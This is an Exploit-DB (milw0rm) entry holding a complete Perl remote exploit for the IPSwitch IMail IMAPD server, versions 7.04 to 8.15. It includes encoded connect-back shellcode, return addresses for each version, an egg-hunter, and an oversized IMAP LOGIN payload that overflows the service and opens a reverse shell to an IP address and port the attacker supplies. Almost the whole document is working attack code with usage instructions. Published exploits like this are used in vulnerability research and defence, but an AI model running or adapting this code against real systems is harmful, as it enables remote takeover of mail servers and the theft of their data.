IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution

EDB-ID:

1124


Author:

kingcope

Type:

remote


Platform:

Linux

Date:

2005-08-01


# IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope
# June 2005
# Confidential!

use IO::Socket;

# 316 bytes
$cbsc = 
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69"
."\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B"
."\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93"
."\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D"
."\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE"
."\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83"
."\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1"
."\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49"
."\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01"
."\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7"
."\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68"
."\xA2\x25\xBB\x04\xBB";

$numtargets = 12;

@targets = 
(
 ["Ipswitch IMAIL Server IMAPD 7.04", "\x5F\x2E\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 7.07", "\x3F\x34\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 7.13", "\x33\x36\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 7.15", "\x53\x36\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 8.00/8.01/8.02/8.03", "\x53\x36\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 8.04", "\x73\x36\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 8.05 NO HOTFIX", "\xB3\x36\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 8.05HF1/8.05HF2/8.05HF3", "\x03\x37\x01\x10", 1],
 ["Ipswitch IMAIL Server IMAPD 8.10", "\xfe\xf9\x01\x10", 0],
 ["Ipswitch IMAIL Server IMAPD 8.11", "\x8e\x02\x02\x10", 0],
 ["Ipswitch IMAIL Server IMAPD 8.12/8.13/8.14", "\x2e\x0b\x02\x10", 0],
 ["Ipswitch IMAIL Server IMAPD 8.15", "\x0e\x0e\x02\x10", 0]
);

print "IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope VER1\n";
if ($#ARGV ne 3) {
	print "usage: imail.pl target targettype yourip yourport\n\n";
    for ($i=0; $i<$numtargets; $i++) {
	 print " [".$i."]...". $targets[$i][0]. "\r\n";
    }	
	exit(0);	
}

$tt=$ARGV[1];
$ret = $targets[$tt][1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);

($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);	  

print "[*] $ARGV[0]\n";
print "[*] ".$targets[$tt][0]."\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '143',
                              Proto    => 'tcp');

$findsc="\x83\xc0\x04\x81\x38\x53\x45\x58\x59\x74\x02\xeb\xf3\x83\xc0\x04\xff\xe0";

if ($targets[$tt][2] eq 0) {
 $a="@" . "SEXY" . $cbsc . "A" x 358 . "\xeb\x04" . $ret . "AAAA" . $findsc . "A" x 1000;	# IMAIL > 8.00
}

if ($targets[$tt][2] eq 1) {
 $a="@" . "SEXY" . $cbsc . "A" x 366 . "\xeb\x04" . $ret . "AAAA" . $findsc . "A" x 1000;	# IMAIL 8.00
}

print $sock "a001 LOGIN \"" . $a . "\" password\r\n";

while(<$sock>) {
		print;
}

# milw0rm.com [2005-08-01]